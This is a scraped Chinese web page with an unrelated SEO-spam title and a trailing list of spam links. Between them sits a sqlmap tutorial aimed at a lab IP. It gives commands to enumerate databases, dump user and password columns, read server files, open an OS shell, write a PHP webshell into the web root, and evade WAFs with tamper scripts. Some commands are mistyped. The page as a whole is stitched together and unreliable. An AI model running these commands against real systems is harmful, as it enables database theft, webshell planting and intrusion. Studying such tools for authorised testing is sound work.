当前位置: 首页 > news >正文

电子商务网站体系结构有哪些?赣州网站建设

news 2025/7/19 18:19:24
电子商务网站体系结构有哪些?,赣州网站建设,网站建设接单源码,建设一个电影网站怎么做i sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任…

i       sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任意命令。

       希望这篇文章能让你不仅有一定的收获,而且可以愉快的学习,如果有什么建议,都可以留言和我交流 

 sqlmap相关参数介绍

  • -u     get注入
  • -r      post注入
  • -r    --level     cookies注入 

执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。 

  • -v   信息级别显示 

ERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面;如果想看到sqlmap发送的测试payload最好的等级就是3。 

  • -p  针对单个参数注入
  • -threads     线程数
  • -batch-smart      智能判断测试
  • --moblie    模拟手机环境站点
  • -m    批量注入

注入获取数据的命令 (python版本为2.7.9)

  • --dbs    系统所有库名(自动检测数据库的类型) 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --dbs

  •  --current-db    获取当前数据库名
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --current-db

  • --current-user   数据库管理系统的当前用户
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --current-user

  • --is-dba   判断当前的用户是否为系统管理员 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --is-dba

true 是管理员false  没有权限

  • --users    系统所有的用户 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --users

  •  --tables   获取表名
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --tables -D abc

  • --coiumns      获取字段名 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --columns -T user -D abc

  • -T 表名 -C username,password --dump   数据的内容 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 =T user -C id,username,password,email --dump

  • 读取文件内容    --file-read   文件路径文件名 
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --file-read c:\1.txt

  •  系统交互的shell   --os-shell
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --os-shell
  •  写webshell

 前提条件my.ini中的secure_file_priv=""要为空

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --file-write  "e:/1.txt" --file-dest "C:/phpstudy/WWW/3.php" -v1

  • sqlmap过waf     --tamper ""   多个参数用逗号隔开
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --tamper "base64encode.py" --dbs -v 4

http://www.yidumall.com/news/26983.html

相关文章:

  • 企业wordpress主题免费下载手机优化助手下载
  • 做网站商城如何优化宁波seo推广推荐
  • wordpress交互插件讯展网站优化推广
  • 新广告法 做网站的手机端网站优化
  • 17zwd一起做网站株洲站陕西网站建设制作
  • 公安部网站备案流程seo公司推广
  • 邹平网站建设优化公司世界网站排名查询
  • 广州网站开发债券交淘宝指数网址
  • 网站域名可以做端口映射吗如何免费发布广告
  • 烟台外贸网站建设网站模板
  • dede仿网站目录网络技术推广服务
  • 大气网站特点网络优化是干什么的
  • 山东大型网站建设防疫测温健康码核验一体机
  • 无锡网站设计厂家百度下载app下载
  • 邵阳网站建设公司百度一下你就知道 官网
  • seo建站是什么app平台搭建
  • wordpress文章专辑外贸seo优化
  • 网站排名软件下载最经典最常用的网站推广方式
  • 东莞建设网站费用2024年3月份病毒会爆发吗
  • 有关大数据的网站及网址电子商务网页制作
  • 免费国外代理网页百度百科优化排名
  • 网站建设项目设计报告上海百度seo网站优化
  • 百度网盘官网南京seo优化培训
  • 如何查询网站使用什么框架做的平台推广是什么
  • 乐清定制网站建设长沙百度提升排名
  • vs2017可以做网站吗搜狐财经峰会
  • 马可波罗网站做外贸查关键词
  • 深圳营销型网站公司北京关键词优化服务
  • 后台网站如何建设百度关键字优化精灵
  • 自学网站建设快吗百度北京总部电话